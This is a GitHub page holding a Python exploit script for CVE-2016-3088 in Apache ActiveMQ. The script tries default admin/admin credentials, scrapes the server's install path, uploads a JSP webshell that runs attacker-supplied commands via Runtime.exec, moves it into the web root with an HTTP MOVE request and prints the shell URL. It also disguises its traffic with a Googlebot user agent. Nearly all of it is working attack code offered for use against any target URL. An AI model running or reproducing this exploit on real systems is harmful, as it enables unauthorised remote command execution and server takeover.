-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathCVE-2016-3088.py
94 lines (85 loc) · 4.21 KB
/
CVE-2016-3088.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
##!/usr/bin/python3
# -*- coding:utf-8 -*-
# author(cn):大剑
# author(en):cl4ym0re
import argparse
import requests
import re
banner = """
___ __ ____ ___ _ __ _____ ___ ___ ___
/ __\/\ /\ /__\ |___ \ / _ \ / | / /_ |___ / / _ \ ( _ ) ( _ )
/ / \ \ / //_\ _____ __) || | | || || '_ \ _____ |_ \ | | | | / _ \ / _ \
/ /___ \ V ///__|_____|/ __/ | |_| || || (_) ||_____|___) || |_| || (_) || (_) |
\____/ \_/ \__/ |_____| \___/ |_| \___/ |____/ \___/ \___/ \___/
"""
def exploit(h):
host = h;
header = {
'Connection': 'close',
'User-Agent': 'Googlebot/2.1 ( http://www.googlebot.com/bot.html)'
}
path = str(host + 'admin/test/systemProperties.jsp')
file_server = str(host + 'fileserver')
api = str(host + 'api')
admin_ = str(host + 'admin')
req = requests.get(file_server, None)
if (bytes("disabled", 'UTF-8') not in req.content) | (bytes("file access.", 'UTF-8') in req.content):
print("\n[+]fileserver Detected!\n")
req = requests.get(api, auth=('admin', 'admin'))
if bytes('Directory: /api/', 'UTF-8') in req.content:
print("[+]Weak password Detected!\n")
req = requests.get(admin_, auth=('admin', 'admin'))
html = str(req.content, 'UTF-8')
version = re.search('5\.\d+\.\d+', html).group()
print('[+]ActiveMQ version:' + version + '\n')
choice = input("[+]It seems like the host is vulnerable,upload webshell?[y/n]\n")
if choice != "y":
exit()
else:
req = requests.get(path, auth=('admin', 'admin'))
if (bytes("activemq.home", 'UTF-8') in req.content):
content = str(req.content, 'UTF-8')
tmp_path = re.search('(activemq\.home[</td>]+)([\r|\n|\s]+)([<td>]+)(.*)([</td>]+)', content).group()
ab_path = re.sub('activemq\.home|<td>|</td>|\r|\n|\s', '', tmp_path)
print("[+]absolute path obtained:" + ab_path + '\n')
#Here you can paste your own webshell↓
payload = r"""<% if("9527".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>"""
tmp_shell_path = file_server + "/noharm.txt"
put = requests.put(tmp_shell_path, data=payload, headers=header)
if put.status_code == 204:
print("[+]Upload txt file success,trying to go deeper......\n")
evil_headers = {
'Destination': 'file://' + ab_path + '/webapps/api/evil.jsp',
'Connection': 'close',
'User-Agent': 'Googlebot/2.1 ( http://www.googlebot.com/bot.html)'
}
move = requests.request('MOVE', url=tmp_shell_path, headers=evil_headers)
if move.status_code == 204:
print("[*]Here is your shell,enjoy!:" + host + "api/evil.jsp?pwd=9527&i=whoami")
exit()
else:
print("[-]Cant figure out the absolute path!")
else:
print("[-]Host is NOT VULNERABLE!!")
else:
print('[-]CAN NOT access fileserver!!\n[-]Host is NOT VULNERABLE!!')
if __name__ == '__main__':
print(banner)
parser = argparse.ArgumentParser()
parser.add_argument("-u","--url",help="http://www.target.com/",type=str)
args = parser.parse_args()
if args.url != None:
exploit(args.url)
else:
print("[-]No URL address was provided or the URL address is illegal")
print("[?]usage: python CVE-2016-3088.py -u http://ip(domain):port/)")